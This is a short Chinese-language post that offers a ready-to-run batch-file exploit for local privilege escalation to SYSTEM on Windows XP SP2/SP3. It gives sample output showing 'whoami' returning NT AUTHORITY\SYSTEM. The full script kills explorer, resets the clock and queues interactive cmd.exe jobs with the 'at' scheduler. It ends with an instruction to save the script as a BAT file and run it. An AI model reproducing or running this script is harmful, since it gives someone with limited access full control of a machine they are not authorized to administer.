Microsoft WinXP sp2/sp3 local system privilege escalation exploit
过程:
# Added a new job with job ID = 1 # Added a new job with job ID = 2 # Added a new job with job ID = 3 # Added a new job with job ID = 4 # Added a new job with job ID = 5 # Added a new job with job ID = 6 # Added a new job with job ID = 7 # Added a new job with job ID = 8 # Added a new job with job ID = 9 # Added a new job with job ID = 10 # Added a new job with job ID = 11 # Added a new job with job ID = 12 # [*] Backup time # The current time is: 13:36:57,67 # Enter the new time: 13:44 # # C:\WINDOWS\system32>whoami # NT AUTHORITY\SYSTEM #
EXP代码:
--------------------------------START---------------------------------------------------------
@echo off echo [+] Microsoft WinXP sp2/sp3 local system privilege escalation exploit start time /T > time.txt tskill explorer time 13:36:59 > nul at 13:37 /interactive cmd.exe at 13:37 /interactive explorer.exe at 13:37 /interactive at /del /y cls at 13:37 /interactive cmd.exe at 13:37 /interactive explorer.exe at 13:37 /interactive at /del /y cls at 13:37 /interactive cmd.exe at 13:37 /interactive explorer.exe at 13:37 /interactive at /del /y cls at 13:37 /interactive cmd.exe at 13:37 /interactive explorer.exe at 13:37 /interactive at /del /y echo [*] Backup time time < time.txt
---------------------------------END-------------------------------------
把上面代码保存为BAT脚本,执行即可。